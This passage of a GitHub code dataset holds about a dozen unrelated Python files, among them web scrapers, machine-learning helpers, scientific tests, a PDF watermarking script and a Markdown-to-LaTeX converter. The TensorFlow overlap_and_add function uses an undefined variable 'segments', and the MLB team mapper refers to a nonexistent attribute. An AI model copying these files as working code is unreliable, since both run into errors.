asyncio.sleep(2)\n stanza['body'] = stanza['body'] + ' c'\n return stanza\n self.clients[0].add_filter('out', add_a)\n self.clients[0].add_filter('out', add_b)\n self.clients[0].add_filter('out', add_c_wait)\n body = 'Msg body'\n msg = self.clients[0].make_message(\n mto=self.clients[1].boundjid, mbody=body,\n )\n msg.send()\n message = await self.clients[1].wait_until('message')\n self.assertEqual(message['body'], body + ' a b c')\n\n\nsuite = unittest.TestLoader().loadTestsFromTestCase(TestSlowFilter)\n","repo_name":"poezio/slixmpp","sub_path":"itests/test_slow_filters.py","file_name":"test_slow_filters.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"21"} +{"seq_id":"74921703733","text":"\n# Web Scraping Homework\n# Author: Michael Regpala\n# Create Date: 20210327\n\n#Import our Modules\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport requests\nimport pandas as pd\nimport time \n\n#Variables\n#Site URL Variables\nsite_base = 'https://astrogeology.usgs.gov'\nmars_latest_news_url = 'https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest'\nmars_gallery_url = 'https://www.jpl.nasa.gov/images?search='\nmars_facts_url = 'https://space-facts.com/mars/'\nmars_hemisphers_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced'\n\n#Global Variables\nparagraph = \"\"\ntitle = \"\"\n\ndef scrape():\n #Use Beautiful Soup to scrape latest news\n html = requests.get(mars_latest_news_url)\n bs = BeautifulSoup(html.text,'html.parser')\n results = bs.find(\"div\",class_=\"slide\")\n #Following variables contain title and paragraph text from latest news article.\n paragraph = results.a.text.strip()\n title = results.find('div',class_=\"content_title\").text.strip()\n\n\n #Setup Chrome session for splinter/selenium scraping\n executable_path = {'executable_path': ChromeDriverManager().install()}\n browser = Browser('chrome', **executable_path, headless=False)\n\n #Use Splinter and Beautiful Soup to get image source for current featured Mars image\n browser.visit(mars_gallery_url)\n time.sleep(2)\n #Click on Mars checkbox to get featured Image\n browser.find_by_css(\"input[id=filter_Mars]\").first.click() \n time.sleep(2)\n bs = BeautifulSoup(browser.html,'html.parser')\n result = bs.find(\"div\", class_='SearchResultCard')\n large_image_html = result.a['href']\n browser.click_link_by_href(large_image_html)\n bs = BeautifulSoup(browser.html,'html.parser')\n results = bs.find(\"div\",class_= \"BaseImagePlaceholder\")\n featured_image_url = results.img['data-src']\n\n #Scrape HTML Tables Mars Stats with Pandas\n\n html = requests.get(mars_facts_url)\n df = pd.read_html(html.text)\n mars_facts_df = df[0]\n cols = [\"Stats\", \"Values\"]\n mars_facts_df.set_axis(cols,axis=\"columns\",inplace=True)\n mars_facts_df.set_index([\"Stats\",\"Values\"],inplace=True)\n #Add bootstrap classes to table HTML markup.\n mars_facts_html_table = mars_facts_df.to_html(classes=[\"table\",\"table-striped\"])\n mars_facts_html_table = mars_facts_html_table.replace('\\n', '')\n\n #Scrape Mars Hemisphere images using selenium\n browser.visit(mars_hemisphers_url)\n time.sleep(1)\n bs = BeautifulSoup(browser.html,'html.parser')\n results = bs.find_all('div', class_=\"item\")\n hemi_image_url_list = []\n for result in results:\n hemi_dict = {}\n link = result.a['href'].strip()\n title_url = result.h3.text\n browser.visit(site_base + link)\n time.sleep(1)\n bs = BeautifulSoup(browser.html,'html.parser')\n res = bs.find('img',class_='wide-image')\n img_url = site_base + res['src']\n hemi_dict = {\"title\":title_url, \"img_url\":img_url}\n hemi_image_url_list.append(hemi_dict)\n\n #BUild return dictionary of required Mars faacts\n final_dict = {\n \"LatestNewsTitle\": title,\n \"LatestNewsParagraph\":paragraph,\n \"FeatureImageUrl\": featured_image_url,\n \"MarsFactHtml\":mars_facts_html_table,\n \"HemispherImageUrlList\":hemi_image_url_list\n }\n browser.quit()\n\n return final_dict\n\n","repo_name":"mregpala/web-scraping-challenge","sub_path":"scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70210772534","text":"import os\n\ndef read_input(filename):\n day_dir = os.path.dirname(os.path.abspath(__file__))\n line = [*open(os.path.join(day_dir, filename), 'r')][0].strip()\n horz, vert = None, None\n for w in line.split():\n if w.startswith('x='):\n horz = tuple(map(int, w[2:-1].split('..')))\n elif w.startswith('y='):\n vert = tuple(map(int, w[2:].split('..')))\n return horz, vert\n","repo_name":"m-tkach/adventofcode","sub_path":"2021/17/iparser.py","file_name":"iparser.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7078286077","text":"'''\nAuthor: liubai\nDate: 2021-03-08\nLastEditTime: 2021-03-08\n'''\n\n\nimport torch\nimport torchvision\n\n# load_data_fashion_mnist()\nimport torchvision.transforms as transforms \n\nimport matplotlib.pyplot as plt\nfrom IPython import display\nimport time\nimport sys\nsys.path.append(\"..\") # 为了导入上层目录的d2lzh_pytorch\n\n# 加载fashionMNIST数据\ndef load_data_fashion_mnist(batch_size): \n # fashionMNIST\n mnist_train = torchvision.datasets.FashionMNIST(\n root='../', \n train=True, download=True, \n transform=transforms.ToTensor())\n\n mnist_test = torchvision.datasets.FashionMNIST(\n root='../', \n train=False, download=True, \n transform=transforms.ToTensor())\n \n # 取batch_size个样本数据\n # 多进程取样本数据 \n if sys.platform.startswith('win'):\n # 进程数\n num_workers=0\n else:\n num_workers=4\n \n # 随机选取batch_size个数据样本\n train_iter=torch.utils.data.DataLoader(mnist_train,\n batch_size=batch_size,\n shuffle=True,num_workers=num_workers)\n test_iter=torch.utils.data.DataLoader(mnist_test,\n batch_size=batch_size,shuffle=False,num_workers=num_workers)\n \n return train_iter,test_iter\n\n\n# 定义函数,将数值类别转为文本标签\ndef get_fashion_mnist_labels(labels):\n text_labels = ['t-shirt', 'trouser', 'pullover', 'dress', 'coat','sandal', 'shirt', 'sneaker', 'bag', 'ankle boot']\n return [text_labels[int(i)] for i in labels]\n\n\n# 定义一个函数,在一行中,画出多个图像及其标签\ndef show_fashion_mnist(images, labels):\n # d2l.use_svg_display()替换为display.set_matplotlib_formats('svg')\n # 载入一批图片,以SVG格式显示图片\n display.set_matplotlib_formats('svg')\n \n # plt.subplots()返回(figure,axes)\n # 等价于fig = plt.figure();fig.add_subplt(111)\n # 这里的_表示我们忽略(不使用)的变量\n # 将figure分为 1*len(images)个子图\n _, figs = plt.subplots(1, len(images), figsize=(12, 12))\n # for xx in zip(yy)表示并行遍历\n for f, img, lbl in zip(figs, images, labels):\n f.imshow(img.view((28, 28)).numpy())\n f.set_title(lbl)\n f.axes.get_xaxis().set_visible(False)\n f.axes.get_yaxis().set_visible(False)\n plt.show()\n\n\"\"\"\n3.13之前\n# 评估net模型在data_iter小批量数据上的准确率\ndef evaluate_accuracy(data_iter,net):\n acc_sum,n=0.0,0\n for X,y in data_iter:\n acc_sum+=(net(X).argmax(dim=1) == y).float().sum().item()\n n+=y.shape[0]\n return acc_sum/n\n\"\"\"\n# 模型中加入dropout,只在训练时使用,在评估的时候需要去掉dropout\ndef evaluate_accuracy(data_iter,net):\n acc_sum,n=0.0,0\n for X,y in data_iter:\n if isinstance(net,torch.nn.Module):\n # 评估模式,会关闭dropout\n net.eval()\n acc_sum+=(net(X).argmax(dim=1) == y).float().sum().item()\n # 改回训练模型\n net.train()\n else:\n # 自定义的模型\n if('is_training' in net.__code__.co_varnames):\n # 如果有is_training这个参数\n acc_sum+=(net(X,is_training=False).argmax(dim=1) == y).float().sum().item()\n n+=y.shape[0]\n return acc_sum/n\n\n\n\n# 反向传播,更新参数params\ndef sgd(params, lr, batch_size):\n # 为了和原书保持一致,这里除以了batch_size,\n # 但是应该是不用除的,因为一般用PyTorch计算loss时就默认已经\n # 沿batch维求了平均了。\n for param in params:\n param.data -= lr * param.grad / batch_size \n # 注意这里更改param时用的param.data\n\n# 定义函数,训练模型\ndef train_ch03(net,train_iter,test_iter,loss,batch_size,num_epochs,params=None,lr=None,optimizer=None):\n for epoch in range(num_epochs):\n train_loss_sum,train_acc_sum,n=0.0,0.0,0\n for X,y in train_iter:\n # 预测值\n y_hat=net(X)\n # 计算损失\n l=loss(y_hat,y).sum()\n\n # 梯度反传之前,梯度清零\n if optimizer is not None:\n optimizer.zero_grad()\n elif params is not None and params[0].grad is not None:\n for param in params:\n param.grad.data.zero_()\n \n # 梯度反传\n l.backward()\n\n if optimizer is None:\n # 更新参数\n sgd(params,lr,batch_size)\n else:\n optimizer.step()\n \n # 累加损失\n # 累加错误个数\n # 累加样本个数\n train_loss_sum+=l.item()\n train_acc_sum+=(y_hat.argmax(dim=1) == y ).sum().item()\n n+=y.shape[0]\n # 一遍epoch结束,计算在测试集上的准确率\n test_acc=evaluate_accuracy(test_iter,net)\n print('epoch %d, loss %.4f, train acc %.3f,test acc %.3f'\n %(epoch+1,train_loss_sum/n,train_acc_sum/n,test_acc))\n\n# 定义一个展平层\nclass FlattenLayer(torch.nn.Module):\n def __init__(self):\n super(FlattenLayer, self).__init__()\n def forward(self, x): # x shape: (batch, *, *, ...)\n return x.view(x.shape[0], -1)\n\n \n","repo_name":"chgex/DIDL","sub_path":"0_DLNote/ch03-base/d2l_pytorch.py","file_name":"d2l_pytorch.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72557530292","text":"from mlbgame import mlbgame\nfrom datetime import datetime\n\nclass Team:\n def __init__(self, full_name, abbreviation, location, wins, losses, record,\n division, standing, todays_game_text, todays_game_score):\n self.full_name = full_name\n self.abbreviation = abbreviation\n self.location = location\n self.wins = wins\n self.losses = losses\n self.record = record\n self.division = division\n self.standing = standing\n self.todays_game_text = todays_game_text\n self.todays_game_score = todays_game_score\n\nclass TeamMapper:\n def __init__(self, divisions, todays_games, abbreviation=None, full_name=None, location=None):\n self.divisions = divisions\n self.todays_games = todays_games\n self.abbreviation = abbreviation\n self.full_name = full_name\n self.location = location\n self.mlb_team = None\n\n def log_team_not_found_error(self):\n errors = \"\"\n if self.abbreviation:\n errors += self.abbreviation\n if self.location:\n errors += \"/ {}\".format(self.location)\n if self.full_name:\n errors += \"/ {}\".format(self.full_name)\n print('No team found for {}'.format(errors))\n\n\n def list_all_team_abbrevs(self):\n abbrevs = []\n for division in self.divisions:\n for team in division.teams:\n abbrevs.append(team.team_abbrev)\n return abbrevs\n\n def populate(self):\n self.find_team()\n if self.mlb_team:\n self.populate_team()\n\n\n def find_team(self):\n for division in self.divisions:\n for team in division.teams:\n if self.abbreviation and self.abbreviation == team.team_abbrev:\n self.mlb_team = team\n self.populate_team()\n elif self.full_name and self.full in team.team_full:\n self.mlb_team = team\n self.populate_team()\n elif self.location and self.location in team.team_full:\n self.mlb_team = team\n self.populate_team()\n elif self.location and self.location in team.team_short:\n self.mlb_team = team\n self.populate_team()\n else:\n continue\n\n\n def find_team_by_name(self, name):\n for division in self.divisions:\n for team in division.teams:\n if name in team.team_full:\n return team\n return None\n\n\n def convert_division_to_short_name(self):\n return (self.mlb_team.division.replace('National League', 'NL')\n .replace('American League', 'AL'))\n\n\n def correct_for_dbacks(self, game_team_name):\n \"\"\"\n Arizona Diamondbacks in mlbgame.standings().divisions[...].team_short\n does not match D-backs in GameScoreboards.\n see\n \"\"\"\n if game_team_name == 'D-backs':\n return 'Diamondbacks'\n return game_team_name\n\n\n def find_todays_game_text(self):\n game_text = \"Off-Day\"\n for game in self.todays_games:\n # GameScoreboard\n if game.home_team in self.mlb_team.team_full:\n real_team_name = self.correct_for_dbacks(game.away_team)\n other_team = self.find_team_by_name(name=real_team_name)\n game_text = self.format_home_team(away_team=other_team.team_abbrev)\n if game.away_team in self.mlb_team.team_full:\n real_team_name = self.correct_for_dbacks(game.home_team)\n other_team = self.find_team_by_name(name=real_team_name)\n game_text = self.format_away_team(home_team=other_team.team_abbrev)\n return game_text\n\n\n def find_todays_game_score(self, home_team_name=None, away_team_name=None):\n score = None\n for game in self.todays_games:\n if game.home_team in home_team_name and game.game_status == 'FINAL':\n score = self.format_score(game)\n if game.away_team in away_team_name and game.game_status == 'FINAL':\n score = self.format_score(game)\n return score\n\n\n def format_score(self, game):\n return \"{}-{}\".format(game.away_team_runs, game.home_team_runs)\n\n\n def format_home_team(self, away_team):\n return \"{}@{}\".format(away_team, self.mlb_team.team_abbrev)\n\n\n def format_away_team(self, home_team):\n return \"{}@{}\".format(self.mlb_team.team_abbrev, home_team)\n\n\n def populate_team(self):\n self.team = Team(full_name=self.mlb_team.team_full,\n abbreviation=self.mlb_team.team_abbrev,\n location=self.mlb_team.team_short,\n wins=self.mlb_team.w,\n losses=self.mlb_team.l,\n record=\"{}W-{}L\".format(self.mlb_team.w, self.mlb_team.l),\n division=self.convert_division_to_short_name(),\n standing=self.mlb_team.place,\n todays_game_text=self.find_todays_game_text(),\n todays_game_score=self.find_todays_game_score(home_team_name=self.mlb_team.team_full, away_team_name=self.mlb_team.team_full))\n","repo_name":"coopernetes/mlb-slack-tracker","sub_path":"baseball/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15400823283","text":"import math\n\ndef get_int():\n\treturn int(input())\n\ndef get_ints():\n\treturn [int(i) for i in input().split()]\n\nn = get_int()\na = get_ints()\n\ns = set()\nsumme = 0\ncount = 0\nfor e in a:\n\tsumme += e\n\n\tif summe in s or summe == 0:\n\t\tcount += 1\n\t\ts = set()\n\t\ts.add(e)\n\t\tsumme = e\n\telse:\n\t\ts.add(summe)\n\nprint(count)","repo_name":"janskrz/comp_coding","sub_path":"codeforces/round_674/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15931823901","text":"\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import tensor_util\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.util import dispatch\nfrom tensorflow.python.util.tf_export import tf_export\n@tf_export(\"signal.overlap_and_add\")\n@dispatch.add_dispatch_support\ndef overlap_and_add(signal, frame_step, name=None):\n \"\"\"Reconstructs a signal from a framed representation.\n Adds potentially overlapping frames of a signal with shape\n `[..., frames, frame_length]`, offsetting subsequent frames by `frame_step`.\n The resulting tensor has shape `[..., output_size]` where\n output_size = (frames - 1) * frame_step + frame_length\n Args:\n signal: A [..., frames, frame_length] `Tensor`. All dimensions may be\n unknown, and rank must be at least 2.\n frame_step: An integer or scalar `Tensor` denoting overlap offsets. Must be\n less than or equal to `frame_length`.\n name: An optional name for the operation.\n Returns:\n A `Tensor` with shape `[..., output_size]` containing the overlap-added\n frames of `signal`'s inner-most two dimensions.\n Raises:\n ValueError: If `signal`'s rank is less than 2, or `frame_step` is not a\n scalar integer.\n \"\"\"\n with ops.name_scope(name, \"overlap_and_add\", [signal, frame_step]):\n signal = ops.convert_to_tensor(signal, name=\"signal\")\n signal.shape.with_rank_at_least(2)\n frame_step = ops.convert_to_tensor(frame_step, name=\"frame_step\")\n frame_step.shape.assert_has_rank(0)\n if not frame_step.dtype.is_integer:\n raise ValueError(\"frame_step must be an integer. Got %s\" %\n frame_step.dtype)\n frame_step_static = tensor_util.constant_value(frame_step)\n frame_step_is_static = frame_step_static is not None\n frame_step = frame_step_static if frame_step_is_static else frame_step\n signal_shape = array_ops.shape(signal)\n signal_shape_static = tensor_util.constant_value(signal_shape)\n if signal_shape_static is not None:\n signal_shape = signal_shape_static\n outer_dimensions = signal_shape[:-2]\n outer_rank = array_ops.size(outer_dimensions)\n outer_rank_static = tensor_util.constant_value(outer_rank)\n if outer_rank_static is not None:\n outer_rank = outer_rank_static\n def full_shape(inner_shape):\n return array_ops.concat([outer_dimensions, inner_shape], 0)\n frame_length = signal_shape[-1]\n frames = signal_shape[-2]\n output_length = frame_length + frame_step * (frames - 1)\n if (frame_step_is_static and signal.shape.dims is not None and\n frame_step == signal.shape.dims[-1].value):\n output_shape = full_shape([output_length])\n return array_ops.reshape(signal, output_shape, name=\"fast_path\")\n paddings = [[0, segments], [0, segments * frame_step - frame_length]]\n outer_paddings = array_ops.zeros([outer_rank, 2], dtypes.int32)\n paddings = array_ops.concat([outer_paddings, paddings], 0)\n signal = array_ops.pad(signal, paddings)\n shape = full_shape([frames + segments, segments, frame_step])\n signal = array_ops.reshape(signal, shape)\n perm = array_ops.concat(\n [math_ops.range(outer_rank), outer_rank + [1, 0, 2]], 0)\n perm_static = tensor_util.constant_value(perm)\n perm = perm_static if perm_static is not None else perm\n signal = array_ops.transpose(signal, perm)\n shape = full_shape([(frames + segments) * segments, frame_step])\n signal = array_ops.reshape(signal, shape)\n signal = signal[..., :(frames + segments - 1) * segments, :]\n shape = full_shape([segments, (frames + segments - 1), frame_step])\n signal = array_ops.reshape(signal, shape)\n signal = math_ops.reduce_sum(signal, -3)\n shape = full_shape([(frames + segments - 1) * frame_step])\n signal = array_ops.reshape(signal, shape)\n signal = signal[..., :output_length]\n return signal\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_0/reconstruction_ops.py.transformed.py","file_name":"reconstruction_ops.py.transformed.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19057622903","text":"#!/usr/bin/env python\n# https://www.analyticsvidhya.com/blog/2016/04/neural-networks-python-theano/\nimport theano\nimport theano.tensor as T\nimport numpy as np\nfrom random import random\nimport matplotlib.pyplot as plt\n\n\n# input\nx = T.matrix('x')\nw = theano.shared(np.array([random(), random()]))\nb = theano.shared(1.)\nlearning_rate = 0.01\na_hat = T.vector() # actual output\n\n# output\nz = T.dot(x, w) + b\na = 1 / (1 + T.exp(-z)) # activation function: sigmoid\ncost = -(a_hat*T.log(a) + (1 - a_hat)*T.log(1-a)).sum()\n\n# training function: gradient descent\ndw, db = T.grad(cost, [w, b])\ntrain = theano.function(\n inputs = [x, a_hat],\n outputs = [a, cost],\n updates = [\n (w, w - learning_rate*dw),\n (b, b - learning_rate*db)\n ]\n)\n\n######################################################\n\n# inputs and outputs\ninputs = [\n (0, 0),\n (0, 1),\n (1, 0),\n (1, 1)\n]\noutputs = [\n 0,\n 0,\n 0,\n 1\n]\n\n# loop over (inputs, outputs) & update (weights, bias)\ncost = []\nfor iteration in range(30000):\n pred, cost_iter = train(inputs, outputs)\n cost.append(cost_iter)\n\n# print the outputs\nfor i in range(len(inputs)):\n print('%d AND %d = %f' % (inputs[i][0], inputs[i][1], pred[i]))\n\n# plot the cost\nplt.plot(cost)\nplt.show()\n\n","repo_name":"h4k1m0u/theano-scripts","sub_path":"and.py","file_name":"and.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2701508307","text":"#!/usr/bin/env python\n\nimport unittest\nfrom functools import reduce\nimport numpy\nfrom pyscf import gto\nfrom pyscf import scf\nfrom pyscf import ao2mo\nfrom pyscf import fci\nfrom pyscf.fci import fci_slow\n\nnelec = (3,4)\nnorb = 8\nh1e = numpy.random.random((norb,norb))\nh2e = numpy.random.random((norb,norb,norb,norb))\nh2e = h2e + h2e.transpose(2,3,0,1)\nna = fci.cistring.num_strings(norb, nelec[0])\nnb = fci.cistring.num_strings(norb, nelec[1])\nci0 = numpy.random.random((na,nb))\n\nclass KnowValues(unittest.TestCase):\n def test_contract(self):\n ci1ref = fci_slow.contract_1e(h1e, ci0, norb, nelec)\n ci1 = fci.direct_nosym.contract_1e(h1e, ci0, norb, nelec)\n self.assertTrue(numpy.allclose(ci1ref, ci1))\n\n ci1ref = fci_slow.contract_2e(h2e, ci0, norb, nelec)\n ci1 = fci.direct_nosym.contract_2e(h2e, ci0, norb, nelec)\n self.assertTrue(numpy.allclose(ci1ref, ci1))\n\n\nif __name__ == \"__main__\":\n print(\"Full Tests for spin1\")\n unittest.main()\n\n","repo_name":"sunchong137/pyscf_2017","sub_path":"fci/test/test_direct_nosym.py","file_name":"test_direct_nosym.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40996660166","text":"import numpy as np\nimport random \nimport nltk.tokenize as tk\nfrom keras.preprocessing.sequence import pad_sequences\nimport keras.utils as ku\nimport time\nimport csv\nwith open('data\\\\vocab.txt','r',encoding='utf-8') as f:\n\tid2w=[line.strip() for line in f.readlines()]\n\tw2id={v:k for k,v in enumerate(id2w)}\n\ncontext=3\nmax_len=30\ndata=[]\nnow = time.time()\nwith open('data\\\\data_to_id_train.csv','r',encoding='utf-8') as f:\n\treader=csv.reader(f)\n\tfor line in reader:\n\t\tsentence=np.array(line,dtype=int)\n\t\ttemp_list=list()\n\t\tfor i in range(0,len(sentence)):\n\t\t\ttemp_list.append(sentence[:i+1])\n\t\ttemp_list=pad_sequences(temp_list,maxlen=max_len,padding=\"pre\")\n\t\tfor i in temp_list:\n\t\t\tdata.append(i)\nprint(\"data length:\"+str(len(data)))\nnow2=time.time()\nprint(\"get data cost:\"+str(now2-now))\ndef generator(batch_size, data=data):\n\tcount=0\n\tdata_length=len(data)\n\twhile True:\n\t\tif(count+batch_size>=data_length):\n\t\t\tcount=0\n\t\ttmp=data[count:count+batch_size]\n\t\tcount+=batch_size\n\t\tprint(count)\n\t\tresult=np.array(tmp)\n\t\tpredictors, label = result[:,:-1],result[:,-1]\n\t\tlabel = ku.to_categorical(label, num_classes=len(w2id))\n\t\tyield predictors,label","repo_name":"ChenTao98/lstm-language-model","sub_path":"dataload.py","file_name":"dataload.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9796025533","text":"import PyPDF3\n\nif __name__ == \"__main__\":\n pdf_file = open(\"/home/felix/Downloads/abc.pdf\", \"rb\")\n pdf_reader = PyPDF3.PdfFileReader(pdf_file)\n pdf_reader.decrypt(\"123\")\n\n watermark_pdf_file = open(\"/home/felix/Downloads/wartermark.pdf\", \"rb\")\n watermark_pdf_reader = PyPDF3.PdfFileReader(watermark_pdf_file)\n\n firstPage = pdf_reader.getPage(0)\n watermark_page = watermark_pdf_reader.getPage(0)\n watermark_page.rotateClockwise(180)\n firstPage.mergePage(watermark_pdf_reader.getPage(0))\n\n pdf_writer = PyPDF3.PdfFileWriter()\n pdf_writer.encrypt(\"abc\") # encryption PDF file\n pdf_writer.addPage(firstPage)\n\n for page_num in range(1, pdf_reader.getNumPages()):\n page_obj = pdf_reader.getPage(page_num)\n pdf_writer.addPage(page_obj)\n\n output_pdf_file = open(\"/home/felix/Downloads/abc_cover.pdf\", \"wb\")\n pdf_writer.write(output_pdf_file)\n\n pdf_file.close()\n watermark_pdf_file.close()\n output_pdf_file.close()\n","repo_name":"tinylambda/keep","sub_path":"books/atbswp/ch13/ch13_1_6.py","file_name":"ch13_1_6.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"934081294","text":"\"\"\"domotica URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\n\nfrom domotica.core import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('iluminacao/', views.lighting, name='lighting'),\n path('videovigilancia/', views.surveillance, name='surveillance'),\n path('cam01/', views.cam01, name='cam01'),\n path('cliente/', views.clientConnect, name='clientConnect')\n]\n","repo_name":"adbrum/domotica","sub_path":"domotica/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29537123060","text":"#!/usr/bin/python3\n# encoding=utf-8\n\nimport sys\nimport mistune\n\n# see http://0x01.me/Python字符编码的一个坑/\nimport codecs\nsys.stdout = codecs.getwriter('utf8')(sys.stdout.detach())\nsys.stdin = codecs.getreader('utf8')(sys.stdin.detach())\n\n\nclass LaTeXRenderer(mistune.Renderer):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.replace = True\n\n def block_code(self, code, lang=None):\n code = code.rstrip('\\n')\n if lang and code:\n code = self.escape(code)\n return '\\\\begin{lstlisting}[language=%s]\\n%s\\n\\\\end{lstlisting}\\n\\n' % (lang, code)\n if lang:\n lang, _, filename = lang[:-1].partition('[')\n return '\\\\lstinputlisting[language=%s, caption={%s}]{%s}\\n\\n' % (lang, self.escape(filename), filename)\n code = self.escape(code)\n return '\\\\begin{lstlisting}\\n%s\\n\\\\end{lstlisting}\\n\\n' % code\n\n def block_quote(self, text):\n return '\\\\begin{quote}%s\\n\\\\end{quote}\\n\\n' % text.rstrip('\\n')\n\n def header(self, text, level, raw=None):\n levels = ['',\n 'section',\n 'subsection',\n 'subsubsection',\n 'paragraph',\n 'subparagraph',\n 'subparagraph']\n return '\\\\%s{%s}\\n\\n' % (levels[level], text)\n\n def hrule(self):\n return '\\\\hrule\\n\\n'\n\n def list(self, body, ordered=True):\n cmd = 'enumerate' if ordered else 'itemize'\n return '\\\\begin{%s}\\n%s\\\\end{%s}\\n\\n' % (cmd, body, cmd)\n\n def list_item(self, text):\n return '\\\\item %s\\n' % text\n\n def paragraph(self, text):\n return '%s\\n\\n' % text.strip(' ')\n\n def table(self, header, body):\n raise NotImplementedError\n\n def table_row(self, content):\n raise NotImplementedError\n\n def table_cell(self, content, **flags):\n raise NotImplementedError\n\n def double_emphasis(self, text):\n return '\\\\textbf{\\\\emph{%s}}' % text\n\n def emphasis(self, text):\n return '\\\\emph{%s}' % text\n\n def codespan(self, text):\n return '\\\\texttt{%s} ' % self.escape(text.rstrip())\n\n def linebreak(self):\n return '\\\\\\n'\n\n def strikethrough(self, text):\n raise NotImplementedError\n\n def text(self, text):\n return self.escape(text)\n\n def escape(self, text):\n if not text:\n return ''\n newtext = ''\n for c in text:\n if c == '$':\n newtext += c\n self.replace = not self.replace\n continue\n if self.replace:\n # c = c.replace('\\\\', '\\\\textbackslash')\n # c = c.replace('{', '\\\\{')\n # c = c.replace('}', '\\\\}')\n # c = c.replace('\\\\textbackslash', '\\\\textbackslash{}')\n c = c.replace('~', '\\\\textasciitilde{}')\n c = c.replace('#', '\\\\#')\n # c = c.replace('$', '\\\\$')\n c = c.replace('%', '\\\\%')\n c = c.replace('^', '\\\\textasciicircum{}')\n c = c.replace('&', '\\\\&')\n c = c.replace('_', '\\\\_')\n newtext += c\n return newtext\n\n def autolink(self, link, is_email=False):\n return self.escape(link)\n\n def link(self, link, title, text):\n return '\\\\href{%s}{%s}' % (self.escape(link), self.escape(text))\n\n def image(self, src, title, text):\n if text:\n return '\\\\ref{%s}%%\\n' \\\n '\\\\begin{figure}[htbp]\\n' \\\n ' \\\\centering\\n' \\\n ' \\\\includegraphics[width=0.8\\\\linewidth]{%s}\\n' \\\n ' \\\\caption{%s}\\n' \\\n ' \\\\label{%s}\\n' \\\n '\\\\end{figure}%%\\n' \\\n % (text, src, self.escape(title), text)\n return '\\\\begin{figure}[H]\\n' \\\n ' \\\\centering\\n' \\\n ' \\\\includegraphics[width=0.8\\\\linewidth]{%s}\\n' \\\n ' \\\\caption{%s}\\n' \\\n '\\\\end{figure}\\n\\n' \\\n % (src, self.escape(title))\n\n def footnote_ref(self, key, index):\n raise NotImplementedError\n\n def footnote_item(self, key, text):\n raise NotImplementedError\n\n def footnotes(self, text):\n return text\n\n\ndef main():\n text = sys.stdin.read()\n front_matter, _, text = text.partition('\\n---\\n')\n args = {}\n for l in front_matter.split('\\n'):\n if ':' in l:\n key, _, value = l.partition(': ')\n args[key] = value\n title = args['title']\n author = args['author']\n renderer = LaTeXRenderer()\n parser = mistune.Markdown(renderer=renderer)\n print(r'''\\documentclass[12pt,a4paper]{article}\n\n\\usepackage{ctex}\n\\usepackage[paper=a4paper,includefoot,margin=54pt]{geometry}\n\\usepackage[colorlinks,linkcolor=black,anchorcolor=black,citecolor=black,unicode]{hyperref}\n\\usepackage{float}\n\\usepackage{listings}\n\\lstset{frame=single,breaklines=true,postbreak=\\raisebox{0ex}[0ex][0ex]{\\ensuremath{\\hookrightarrow\\space}}}\n\n\\renewcommand{\\lstlistingname}{程序}\n\\renewcommand{\\contentsname}{目录}\n\\renewcommand{\\abstractname}{摘要}\n\\renewcommand{\\refname}{参考文献}\n\\renewcommand{\\indexname}{索引}\n\\renewcommand{\\figurename}{图}\n\\renewcommand{\\tablename}{表}\n\\renewcommand{\\appendixname}{附录}\n\n\\begin{document}\n\n\\title{%s}\n\\author{%s}\n\n\\maketitle\n\\tableofcontents\n\\newpage\n''' % (title, author))\n print(parser(text))\n print('\\\\end{document}')\n\nif __name__ == '__main__':\n 